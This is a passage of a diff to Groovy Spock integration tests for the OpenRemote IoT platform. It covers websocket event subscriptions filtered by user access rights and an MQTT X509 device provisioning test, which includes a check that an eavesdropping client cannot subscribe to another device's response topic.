+      } as TriggeredEventSubscription<AttributeEvent>
+      def assetSub = receivedMessages3.find{
+        it instanceof TriggeredEventSubscription && it.subscriptionId == "assets3"
+      } as TriggeredEventSubscription<AssetEvent>
+      assert assetSub != null
+      assert assetSub.events.size() == 1
+      assert assetSub.events.get(0).id == managerTestSetup.apartment1LivingroomId
+      assert assetSub.events.get(0).attributeNames.size() == 1
+      assert assetSub.events.get(0).attributeNames.contains(Asset.NOTES.name)
+      assert attrSub != null
+      assert attrSub.events.size() == 1
+      assert attrSub.events.get(0).id == managerTestSetup.apartment1LivingroomId
+      assert attrSub.events.get(0).name == Asset.NOTES.name
+    }
+
+    and: "the building user should not have received the event"
+    assert receivedMessages2.isEmpty()
+
+    when: "apartment 1 asset is modified"
+    receivedMessages.clear()
+    receivedMessages2.clear()
+    receivedMessages3.clear()
+    def apartment1 = assetStorageService.find(managerTestSetup.apartment1Id)
+    apartment1.getAttribute(Asset.LOCATION).get().setValue(new GeoJSONPoint(10, 10))
+    apartment1.getAttribute(BuildingAsset.STREET).get().setValue("Test Street")
+    apartment1 = assetStorageService.merge(apartment1)
+
+    then: "the testuser3 client should be notified with only accessible attributes"
+    conditions.eventually {
+      assert receivedMessages.size() == 3
+      def attr1Sub = receivedMessages.find{
+        it instanceof TriggeredEventSubscription && it.subscriptionId == "attributes" && it.events.any {
+          ((AttributeEvent)it).ref.name == BuildingAsset.STREET.name
+        }
+      } as TriggeredEventSubscription<AttributeEvent>
+      def attr2Sub = receivedMessages.find{
+        it instanceof TriggeredEventSubscription && it.subscriptionId == "attributes" && it.events.any {
+          ((AttributeEvent)it).ref.name == Asset.LOCATION.name
+        }
+      } as TriggeredEventSubscription<AttributeEvent>
+      def assetSub = receivedMessages.find{
+        it instanceof TriggeredEventSubscription && it.subscriptionId == "assets"
+      } as TriggeredEventSubscription<AssetEvent>
+      assert assetSub != null
+      assert assetSub.events.size() == 1
+      assert assetSub.events.get(0).id == managerTestSetup.apartment1Id
+      assert assetSub.events.get(0).attributeNames.size() == 8
+      assert assetSub.events.get(0).attributeNames.contains(BuildingAsset.STREET.name)
+      assert attr1Sub != null
+      assert attr1Sub.events.size() == 1
+      assert attr1Sub.events.get(0).id == managerTestSetup.apartment1Id
+      assert attr1Sub.events.get(0).name == BuildingAsset.STREET.name
+      assert attr2Sub != null
+      assert attr2Sub.events.size() == 1
+      assert attr2Sub.events.get(0).id == managerTestSetup.apartment1Id
+      assert attr2Sub.events.get(0).name == Asset.LOCATION.name
+    }
+
+    then: "the anonymous client should be notified with only accessible attributes"
+    conditions.eventually {
+      assert receivedMessages3.size() == 2
+      def attrSub = receivedMessages3.find{
+        it instanceof TriggeredEventSubscription && it.subscriptionId == "attributes3"
+      } as TriggeredEventSubscription<AttributeEvent>
+      def assetSub = receivedMessages3.find{
+        it instanceof TriggeredEventSubscription && it.subscriptionId == "assets3"
+      } as TriggeredEventSubscription<AssetEvent>
+      assert assetSub != null
+      assert assetSub.events.size() == 1
+      assert assetSub.events.get(0).id == managerTestSetup.apartment1Id
+      assert assetSub.events.get(0).attributeNames.size() == 1
+      assert assetSub.events.get(0).attributeNames.contains(Asset.LOCATION.name)
+      assert attrSub != null
+      assert attrSub.events.size() == 1
+      assert attrSub.events.get(0).id == managerTestSetup.apartment1Id
+      assert attrSub.events.get(0).name == BuildingAsset.LOCATION.name
+    }
+
+    and: "the building user should not have received the event"
+    assert receivedMessages2.isEmpty()
+
+    cleanup: "the server should be stopped"
+    if (client != null) {
+      client.disconnect()
+    }
+    if (client2 != null) {
+      client2.disconnect()
+    }
+    if (client3 != null) {
+      client3.disconnect()
+    }
+  }
+
+  def "Check client"() {
+
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 20, delay: 0.2)
+
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+
+    and: "a simple Websocket client"
+    def client = new WebsocketIOClient<String>(
+            new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=master").build(),
+            null,
+            new OAuthPasswordGrant("http://127.0.0.1:$serverPort/auth/realms/master/protocol/openid-connect/token",
+            KEYCLOAK_CLIENT_ID,
+            null,
+            null,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)))
+    client.setEncoderDecoderProvider({
+      [new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)].toArray(new ChannelHandler[0])
+    })
+
+    and: "we add callback consumers to the client"
+    def connectionStatus = client.getConnectionStatus()
+    List<String> receivedMessages = new CopyOnWriteArrayList<>()
+    client.addMessageConsumer(
+            message -> receivedMessages.add(messageFromString(message))
+            )
+    client.addConnectionStatusConsumer({ status ->
+      connectionStatus = status
+    })
+
+    and: "the system settles down"
+    noEventProcessedIn(assetProcessingService, 500)
+
+    when: "we call connect on the client"
+    client.connect()
+
+    then: "the client status should become CONNECTED"
+    conditions.eventually {
+      assert client.connectionStatus == ConnectionStatus.CONNECTED
+      assert connectionStatus == ConnectionStatus.CONNECTED
+    }
+
+    // TODO: Remove this once client supports some better connection logic
+    and: "some time passes to allow the connection to be fully initialised"
+    sleep(3000)
+
+    when: "we subscribe to attribute events produced by the server"
+    client.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
+            new EventSubscription(
+                    AttributeEvent.class,
+                    new AssetFilter<AttributeEvent>().setAssetIds(managerTestSetup.apartment1LivingroomId),
+                    "1")))
+
+    then: "the server should return a subscribed event"
+    conditions.eventually {
+      assert receivedMessages.size() == 1
+      EventSubscription subscription = receivedMessages[0] as EventSubscription
+      assert subscription != null
+      assert subscription.subscriptionId == "1"
+    }
+
+    when: "when apartment 1 living room temp changes"
+    receivedMessages.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", 5))
+
+    then: "the client receives the event"
+    conditions.eventually {
+      assert receivedMessages.size() == 1
+      TriggeredEventSubscription triggeredEvent = receivedMessages[0] as TriggeredEventSubscription
+      assert triggeredEvent.subscriptionId == "1"
+      assert triggeredEvent.events.size() == 1
+      assert ((AttributeEvent)triggeredEvent.events[0]).id == managerTestSetup.apartment1LivingroomId
+      assert ((AttributeEvent)triggeredEvent.events[0]).name == "targetTemperature"
+      assert ((AttributeEvent)triggeredEvent.events[0]).value.orElse(0) == 5
+    }
+
+    when: "when apartment 1 living room temp is set to the same value again"
+    receivedMessages.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", 5))
+
+    then: "the client should receive the event"
+    conditions.eventually {
+      assert receivedMessages.size() == 1
+      TriggeredEventSubscription triggeredEvent = receivedMessages[0] as TriggeredEventSubscription
+      assert triggeredEvent.subscriptionId == "1"
+      assert triggeredEvent.events.size() == 1
+      assert ((AttributeEvent)triggeredEvent.events[0]).id == managerTestSetup.apartment1LivingroomId
+      assert ((AttributeEvent)triggeredEvent.events[0]).name == "targetTemperature"
+      assert ((AttributeEvent)triggeredEvent.events[0]).value.orElse(0) == 5
+    }
+
+    when: "when apartment 1 living room temp is set to null"
+    receivedMessages.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", null))
+
+    then: "the client receives the event"
+    conditions.eventually {
+      assert receivedMessages.size() == 1
+      TriggeredEventSubscription triggeredEvent = receivedMessages[0] as TriggeredEventSubscription
+      assert triggeredEvent.subscriptionId == "1"
+      assert triggeredEvent.events.size() == 1
+      assert ((AttributeEvent)triggeredEvent.events[0]).id == managerTestSetup.apartment1LivingroomId
+      assert ((AttributeEvent)triggeredEvent.events[0]).name == "targetTemperature"
+      assert !((AttributeEvent)triggeredEvent.events[0]).value.isPresent()
+    }
+
+    when: "when apartment 1 bathroom temp changes"
+    receivedMessages.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1BathroomId, "targetTemperature", 10))
+
+    then: "the bathroom target temp should have changed"
+    conditions.eventually {
+      def bathroom = assetStorageService.find(managerTestSetup.apartment1BathroomId)
+      assert bathroom.getAttribute("targetTemperature").flatMap{it.value}.orElse(0d) == 10d
+    }
+
+    and: "the client should not have received the event"
+    conditions.eventually {
+      assert receivedMessages.isEmpty()
+    }
+
+    cleanup: "the server should be stopped"
+    if (client != null) {
+      client.disconnect()
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/provisioning/UserAndAssetProvisioningTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/provisioning/UserAndAssetProvisioningTest.groovy
@@ -69,788 +69,811 @@ import static org.openremote.model.value.ValueType.NUMBER
 
 class UserAndAssetProvisioningTest extends Specification implements ManagerContainerTrait {
 
-    @SuppressWarnings("GroovyAccessibility")
-    def "Check basic functionality"() {
+  @SuppressWarnings("GroovyAccessibility")
+  def "Check basic functionality"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 20, delay: 0.2)
-        MQTT_IOClient device1Client
-        MQTT_IOClient device1SnoopClient
-        MQTT_IOClient deviceNClient
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 20, delay: 0.2)
+    MQTT_IOClient device1Client
+    MQTT_IOClient device1SnoopClient
+    MQTT_IOClient deviceNClient
 
-        and: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def provisioningService = container.getService(ProvisioningService.class)
-        def mqttBrokerService = container.getService(MQTTBrokerService.class)
-        def defaultMQTTHandler = mqttBrokerService.getCustomHandlers().find{it instanceof DefaultMQTTHandler} as DefaultMQTTHandler
-        def clientEventService = container.getService(ClientEventService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def identityService = container.getService(ManagerIdentityService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def userAssetProvisioningMQTTHandler = mqttBrokerService.customHandlers.find {it instanceof UserAssetProvisioningMQTTHandler} as UserAssetProvisioningMQTTHandler
-        def mqttHost = mqttBrokerService.host
-        def mqttPort = mqttBrokerService.port
+    and: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def provisioningService = container.getService(ProvisioningService.class)
+    def mqttBrokerService = container.getService(MQTTBrokerService.class)
+    def defaultMQTTHandler = mqttBrokerService.getCustomHandlers().find{
+      it instanceof DefaultMQTTHandler
+    } as DefaultMQTTHandler
+    def clientEventService = container.getService(ClientEventService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def identityService = container.getService(ManagerIdentityService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def userAssetProvisioningMQTTHandler = mqttBrokerService.customHandlers.find {
+      it instanceof UserAssetProvisioningMQTTHandler
+    } as UserAssetProvisioningMQTTHandler
+    def mqttHost = mqttBrokerService.host
+    def mqttPort = mqttBrokerService.port
 
-        // A consumer in the client topic map only means the client asked for the subscription; the broker registers it
-        // asynchronously and a response published before then is lost, so requests must await the broker side
-        def responseSubscribed = { String clientId, String responseTopic ->
-            def brokerConnection = mqttBrokerService.getConnectionFromClientID(clientId)
-            brokerConnection != null && userAssetProvisioningMQTTHandler.responseSubscribedConnections.get(responseTopic) === brokerConnection
-        }
+    // A consumer in the client topic map only means the client asked for the subscription; the broker registers it
+    // asynchronously and a response published before then is lost, so requests must await the broker side
+    def responseSubscribed = { String clientId, String responseTopic ->
+      def brokerConnection = mqttBrokerService.getConnectionFromClientID(clientId)
+      brokerConnection != null && userAssetProvisioningMQTTHandler.responseSubscribedConnections.get(responseTopic) === brokerConnection
+    }
 
-        and: "a realm is created with some custom realm roles"
-        def realm = new Realm()
-        realm.setName("test")
-        realm.setDisplayName("Test")
-        realm.setEnabled(true)
-        realm.setDuplicateEmailsAllowed(true)
-        realm.setRememberMe(true)
-        realm = identityService.getIdentityProvider().createRealm(realm)
-        (identityService.getIdentityProvider() as KeycloakIdentityProvider).getRealms(realmsResource -> {
-            RealmResource realmResource = realmsResource.realm(realm.getName())
-            realmResource.roles().create(new RoleRepresentation("installer", "Installer", false))
-            realmResource.roles().create(new RoleRepresentation("home-owner", "Home owner", false))
-        })
+    and: "a realm is created with some custom realm roles"
+    def realm = new Realm()
+    realm.setName("test")
+    realm.setDisplayName("Test")
+    realm.setEnabled(true)
+    realm.setDuplicateEmailsAllowed(true)
+    realm.setRememberMe(true)
+    realm = identityService.getIdentityProvider().createRealm(realm)
+    (identityService.getIdentityProvider() as KeycloakIdentityProvider).getRealms(realmsResource -> {
+      RealmResource realmResource = realmsResource.realm(realm.getName())
+      realmResource.roles().create(new RoleRepresentation("installer", "Installer", false))
+      realmResource.roles().create(new RoleRepresentation("home-owner", "Home owner", false))
+    })
 
-        and: "an internal attribute event subscriber is added for test validation purposes"
-        List<AttributeEvent> internalAttributeEvents = new CopyOnWriteArrayList<>()
-        Consumer<AttributeEvent> internalConsumer = { ev ->
-            internalAttributeEvents.add(ev)
-        }
-        clientEventService.addSubscription(AttributeEvent.class, null, internalConsumer)
+    and: "an internal attribute event subscriber is added for test validation purposes"
+    List<AttributeEvent> internalAttributeEvents = new CopyOnWriteArrayList<>()
+    Consumer<AttributeEvent> internalConsumer = { ev ->
+      internalAttributeEvents.add(ev)
+    }
+    clientEventService.addSubscription(AttributeEvent.class, null, internalConsumer)
 
-        // TODO: Switch to use provisioning resource once implemented
-        when: "a provisioning realm config is added to the system"
-        def provisioningConfig = new X509ProvisioningConfig("Valid Test Config",
-                new X509ProvisioningData()
-                        .setCACertPEM(getClass().getResource("/org/openremote/test/provisioning/ca.pem").text)
-        ).setAssetTemplate(
-                ValueUtil.asJSON(
-                        new WeatherAsset("Weather Asset")
-                            .addAttributes(
-                                new Attribute<>("customAttribute", NUMBER).addMeta(
-                                        new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ),
-                                        new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_WRITE)
-                                ),
-                                new Attribute<>("serialNumber", ValueType.TEXT, UNIQUE_ID_PLACEHOLDER),
-                                new Attribute<>("connected", BOOLEAN).addMeta(
-                                        new MetaItem<>(MetaItemType.USER_CONNECTED, PROVISIONING_USER_PREFIX + "device1")
-                                )
+    // TODO: Switch to use provisioning resource once implemented
+    when: "a provisioning realm config is added to the system"
+    def provisioningConfig = new X509ProvisioningConfig("Valid Test Config",
+            new X509ProvisioningData()
+            .setCACertPEM(getClass().getResource("/org/openremote/test/provisioning/ca.pem").text)
+            ).setAssetTemplate(
+            ValueUtil.asJSON(
+                    new WeatherAsset("Weather Asset")
+                    .addAttributes(
+                            new Attribute<>("customAttribute", NUMBER).addMeta(
+                                    new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ),
+                                    new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_WRITE)
+                                    ),
+                            new Attribute<>("serialNumber", ValueType.TEXT, UNIQUE_ID_PLACEHOLDER),
+                            new Attribute<>("connected", BOOLEAN).addMeta(
+                                    new MetaItem<>(MetaItemType.USER_CONNECTED, PROVISIONING_USER_PREFIX + "device1")
+                                    )
                             )
-                ).orElse("")
-        ).setRealm("building")
-                .setRestrictedUser(true)
-                .setUserRoles([
-                        ClientRole.WRITE_ASSETS,
-                        ClientRole.WRITE_ATTRIBUTES,
-                        ClientRole.READ_ASSETS
-                ] as ClientRole[])
-        provisioningConfig = provisioningService.merge(provisioningConfig)
+                    ).orElse("")
+            ).setRealm("building")
+            .setRestrictedUser(true)
+            .setUserRoles([
+              ClientRole.WRITE_ASSETS,
+              ClientRole.WRITE_ATTRIBUTES,
+              ClientRole.READ_ASSETS
+            ] as ClientRole[])
+    provisioningConfig = provisioningService.merge(provisioningConfig)
 
-        then: "then the config should be available in the system"
-        conditions.eventually {
-            def storedConfigs = provisioningService.getProvisioningConfigs()
-            assert storedConfigs.size() == 1
-            assert storedConfigs.get(0) instanceof X509ProvisioningConfig
-            assert ((X509ProvisioningConfig)storedConfigs.get(0)).getData() != null
-            assert ((X509ProvisioningConfig)storedConfigs.get(0)).getData().getCACertPEM() == provisioningConfig.getData().getCACertPEM()
-        }
+    then: "then the config should be available in the system"
+    conditions.eventually {
+      def storedConfigs = provisioningService.getProvisioningConfigs()
+      assert storedConfigs.size() == 1
+      assert storedConfigs.get(0) instanceof X509ProvisioningConfig
+      assert ((X509ProvisioningConfig)storedConfigs.get(0)).getData() != null
+      assert ((X509ProvisioningConfig)storedConfigs.get(0)).getData().getCACertPEM() == provisioningConfig.getData().getCACertPEM()
+    }
 
-        when: "a mqtt client connects"
-        RemotingConnection connection = null
-        def device1UniqueId = "device1"
-        def mqttDevice1ClientId = UniqueIdentifierGenerator.generateId("device1")
-        def mqttDevice1SnoopClientId = UniqueIdentifierGenerator.generateId("device1snoop")
-        List<String> subscribeFailures = new CopyOnWriteArrayList<>()
-        List<ConnectionStatus> connectionStatuses = new CopyOnWriteArrayList<>()
-        Consumer<String> subscribeFailureCallback = {String topic ->
-            subscribeFailures.add(topic)
-            LOG.info("device1Client failed to subscribe to topic: ${topic}")
-        }
-        Consumer<String> deviceNSubscribeFailureCallback = { String topic ->
-            subscribeFailures.add(topic)
-            LOG.info("deviceNClient failed to subscribe to topic: ${topic}")
-        }
-        device1Client = new MQTT_IOClient(mqttDevice1ClientId, mqttHost, mqttPort, false, false, null, null, null)
-        device1SnoopClient = new MQTT_IOClient(mqttDevice1SnoopClientId, mqttHost, mqttPort, false, false, null, null, null)
-        device1Client.setTopicSubscribeFailureConsumer(subscribeFailureCallback)
-        device1Client.setRemoveConsumersOnSubscriptionFailure(true)
-        device1Client.addConnectionStatusConsumer({connectionStatus ->
-            LOG.info("Device 1 connection status changed: $connectionStatus")
-            connectionStatuses.add(connectionStatus)})
-        device1Client.connect()
+    when: "a mqtt client connects"
+    RemotingConnection connection = null
+    def device1UniqueId = "device1"
+    def mqttDevice1ClientId = UniqueIdentifierGenerator.generateId("device1")
+    def mqttDevice1SnoopClientId = UniqueIdentifierGenerator.generateId("device1snoop")
+    List<String> subscribeFailures = new CopyOnWriteArrayList<>()
+    List<ConnectionStatus> connectionStatuses = new CopyOnWriteArrayList<>()
+    Consumer<String> subscribeFailureCallback = {String topic ->
+      subscribeFailures.add(topic)
+      LOG.info("device1Client failed to subscribe to topic: ${topic}")
+    }
+    Consumer<String> deviceNSubscribeFailureCallback = { String topic ->
+      subscribeFailures.add(topic)
+      LOG.info("deviceNClient failed to subscribe to topic: ${topic}")
+    }
+    device1Client = new MQTT_IOClient(mqttDevice1ClientId, mqttHost, mqttPort, false, false, null, null, null)
+    device1SnoopClient = new MQTT_IOClient(mqttDevice1SnoopClientId, mqttHost, mqttPort, false, false, null, null, null)
+    device1Client.setTopicSubscribeFailureConsumer(subscribeFailureCallback)
+    device1Client.setRemoveConsumersOnSubscriptionFailure(true)
+    device1Client.addConnectionStatusConsumer({connectionStatus ->
+      LOG.info("Device 1 connection status changed: $connectionStatus")
+      connectionStatuses.add(connectionStatus)
+    })
+    device1Client.connect()
 
-        then: "mqtt client should be connected"
-        conditions.eventually {
-            assert device1Client.getConnectionStatus() == ConnectionStatus.CONNECTED
-        }
+    then: "mqtt client should be connected"
+    conditions.eventually {
+      assert device1Client.getConnectionStatus() == ConnectionStatus.CONNECTED
+    }
 
-        when: "the client subscribes to the provisioning endpoints"
-        List<ProvisioningMessage> device1Responses = new CopyOnWriteArrayList<>()
-        Consumer<MQTTMessage<String>> device1MessageConsumer = { MQTTMessage<String> msg ->
-            device1Responses.add(ValueUtil.parse(msg.payload, ProvisioningMessage.class).orElse(null))
-        }
-        def device1RequestTopic = "$PROVISIONING_TOKEN/$device1UniqueId/$REQUEST_TOKEN".toString()
-        def device1ResponseTopic = "$PROVISIONING_TOKEN/$device1UniqueId/$RESPONSE_TOKEN".toString()
-        device1Client.addMessageConsumer(device1ResponseTopic, device1MessageConsumer)
+    when: "the client subscribes to the provisioning endpoints"
+    List<ProvisioningMessage> device1Responses = new CopyOnWriteArrayList<>()
+    Consumer<MQTTMessage<String>> device1MessageConsumer = { MQTTMessage<String> msg ->
+      device1Responses.add(ValueUtil.parse(msg.payload, ProvisioningMessage.class).orElse(null))
+    }
+    def device1RequestTopic = "$PROVISIONING_TOKEN/$device1UniqueId/$REQUEST_TOKEN".toString()
+    def device1ResponseTopic = "$PROVISIONING_TOKEN/$device1UniqueId/$RESPONSE_TOKEN".toString()
+    device1Client.addMessageConsumer(device1ResponseTopic, device1MessageConsumer)
 
-        then: "the subscriptions should succeed"
-        conditions.eventually {
-            assert device1Client.topicConsumerMap.get(device1ResponseTopic) != null
-            assert device1Client.topicConsumerMap.get(device1ResponseTopic).consumers.size() == 1
-            assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
-        }
+    then: "the subscriptions should succeed"
+    conditions.eventually {
+      assert device1Client.topicConsumerMap.get(device1ResponseTopic) != null
+      assert device1Client.topicConsumerMap.get(device1ResponseTopic).consumers.size() == 1
+      assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
+    }
 
-        when: "an eavesdropping client connects"
-        device1SnoopClient.setTopicSubscribeFailureConsumer(subscribeFailureCallback)
-        device1SnoopClient.setRemoveConsumersOnSubscriptionFailure(true)
-        device1SnoopClient.connect()
+    when: "an eavesdropping client connects"
+    device1SnoopClient.setTopicSubscribeFailureConsumer(subscribeFailureCallback)
+    device1SnoopClient.setRemoveConsumersOnSubscriptionFailure(true)
+    device1SnoopClient.connect()
 
-        then: "it should be connected"
-        conditions.eventually {
-            assert device1SnoopClient.getConnectionStatus() == ConnectionStatus.CONNECTED
-        }
+    then: "it should be connected"
+    conditions.eventually {
+      assert device1SnoopClient.getConnectionStatus() == ConnectionStatus.CONNECTED
+    }
 
-        when: "the eavesdropping client subscribes to the provisioning response topic"
-        device1SnoopClient.addMessageConsumer(device1ResponseTopic, device1MessageConsumer)
+    when: "the eavesdropping client subscribes to the provisioning response topic"
+    device1SnoopClient.addMessageConsumer(device1ResponseTopic, device1MessageConsumer)
 
-        then: "the subscription should have failed"
-        conditions.eventually {
-            assert subscribeFailures.last == device1ResponseTopic
-            assert device1SnoopClient.topicConsumerMap.get(device1ResponseTopic) == null
-            assert subscribeFailures.size() == 1
-        }
+    then: "the subscription should have failed"
+    conditions.eventually {
+      assert subscribeFailures.last == device1ResponseTopic
+      assert device1SnoopClient.topicConsumerMap.get(device1ResponseTopic) == null
+      assert subscribeFailures.size() == 1
+    }
 
-        and: "the actual client should still be connected and subscribed"
-        conditions.eventually {
-            assert device1Client.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert device1Client.topicConsumerMap.get(device1ResponseTopic) != null
-            assert device1Client.topicConsumerMap.get(device1ResponseTopic).consumers.size() == 1
-            assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
-        }
+    and: "the actual client should still be connected and subscribed"
+    conditions.eventually {
+      assert device1Client.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert device1Client.topicConsumerMap.get(device1ResponseTopic) != null
+      assert device1Client.topicConsumerMap.get(device1ResponseTopic).consumers.size() == 1
+      assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
+    }
 
-        when: "the client publishes a valid x509 certificate that has been signed by the CA stored in the provisioning config"
-        subscribeFailures.clear()
-        def existingConnection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
-        device1Client.sendMessage(
+    when: "the client publishes a valid x509 certificate that has been signed by the CA stored in the provisioning config"
+    subscribeFailures.clear()
+    def existingConnection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
+    device1Client.sendMessage(
             new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
                     new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
-            ).orElse(null))
-        )
+                    ).orElse(null))
+            )
 
-        then: "the broker should have published to the response topic a success message containing the provisioned asset"
-        String weatherAssetID
-        Asset<WeatherAsset> weatherAsset
-        conditions.eventually {
-            assert device1Responses.size() == 1
-            assert device1Responses.get(0) instanceof SuccessResponseMessage
-            assert ((SuccessResponseMessage)device1Responses.get(0)).realm == managerTestSetup.realmBuildingName
-            weatherAssetID = ((SuccessResponseMessage)device1Responses.get(0)).asset.id
-            weatherAsset = ((SuccessResponseMessage)device1Responses.get(0)).asset
-            assert weatherAsset != null
-            assert weatherAsset instanceof WeatherAsset
-            assert weatherAsset.getAttribute("serialNumber").flatMap{it.getValue()}.orElse(null) == device1UniqueId
-        }
+    then: "the broker should have published to the response topic a success message containing the provisioned asset"
+    String weatherAssetID
+    Asset<WeatherAsset> weatherAsset
+    conditions.eventually {
+      assert device1Responses.size() == 1
+      assert device1Responses.get(0) instanceof SuccessResponseMessage
+      assert ((SuccessResponseMessage)device1Responses.get(0)).realm == managerTestSetup.realmBuildingName
+      weatherAssetID = ((SuccessResponseMessage)device1Responses.get(0)).asset.id
+      weatherAsset = ((SuccessResponseMessage)device1Responses.get(0)).asset
+      assert weatherAsset != null
+      assert weatherAsset instanceof WeatherAsset
+      assert weatherAsset.getAttribute("serialNumber").flatMap{
+        it.getValue()
+      }.orElse(null) == device1UniqueId
+    }
 
-        and: "the connection should have been maintained"
-        new PollingConditions(initialDelay: 1, timeout: 10, delay: 0.5).eventually {
-            assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) == existingConnection
-        }
+    and: "the connection should have been maintained"
+    new PollingConditions(initialDelay: 1, timeout: 10, delay: 0.5).eventually {
+      assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) == existingConnection
+    }
 
-        when: "the client gets abruptly disconnected"
-        device1Responses.clear()
-        existingConnection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
-//        ((NioSocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)device1Client.client).clientConfig).delegate).connectionConfig.get()).channel).config().setOption(ChannelOption.SO_LINGER, 0I)
-        ((SocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)device1Client.client).clientConfig).delegate).connectionConfig.get()).channel).close()
+    when: "the client gets abruptly disconnected"
+    device1Responses.clear()
+    existingConnection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
+    //        ((NioSocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)device1Client.client).clientConfig).delegate).connectionConfig.get()).channel).config().setOption(ChannelOption.SO_LINGER, 0I)
+    ((SocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)device1Client.client).clientConfig).delegate).connectionConfig.get()).channel).close()
 
-        then: "the client should reconnect"
-        conditions.eventually {
-            assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != null
-            assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) !== existingConnection
-        }
+    then: "the client should reconnect"
+    conditions.eventually {
+      assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != null
+      assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) !== existingConnection
+    }
 
-        then: "the subscriptions should succeed"
-        conditions.eventually {
-            assert device1Client.topicConsumerMap.get(device1ResponseTopic) != null
-            assert device1Client.topicConsumerMap.get(device1ResponseTopic).consumers.size() == 1
-            assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
-            assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != null
-        }
+    then: "the subscriptions should succeed"
+    conditions.eventually {
+      assert device1Client.topicConsumerMap.get(device1ResponseTopic) != null
+      assert device1Client.topicConsumerMap.get(device1ResponseTopic).consumers.size() == 1
+      assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
+      assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != null
+    }
 
-        when: "the client publishes a valid x509 certificate that has been signed by the CA stored in the provisioning config"
-        device1Client.sendMessage(
-                new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
-                        new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
-                ).orElse(null))
-        )
+    when: "the client publishes a valid x509 certificate that has been signed by the CA stored in the provisioning config"
+    device1Client.sendMessage(
+            new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
+                    new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
+                    ).orElse(null))
+            )
 
-        then: "the broker should have published to the response topic a success message containing the provisioned asset"
-        conditions.eventually {
-            assert device1Responses.size() == 1
-            assert device1Responses.get(0) instanceof SuccessResponseMessage
-            assert ((SuccessResponseMessage)device1Responses.get(0)).realm == managerTestSetup.realmBuildingName
-            weatherAsset = ((SuccessResponseMessage)device1Responses.get(0)).asset
-            assert weatherAsset != null
-            assert weatherAsset instanceof WeatherAsset
-            assert weatherAsset.getAttribute("serialNumber").flatMap{it.getValue()}.orElse(null) == device1UniqueId
-        }
+    then: "the broker should have published to the response topic a success message containing the provisioned asset"
+    conditions.eventually {
+      assert device1Responses.size() == 1
+      assert device1Responses.get(0) instanceof SuccessResponseMessage
+      assert ((SuccessResponseMessage)device1Responses.get(0)).realm == managerTestSetup.realmBuildingName
+      weatherAsset = ((SuccessResponseMessage)device1Responses.get(0)).asset
+      assert weatherAsset != null
+      assert weatherAsset instanceof WeatherAsset
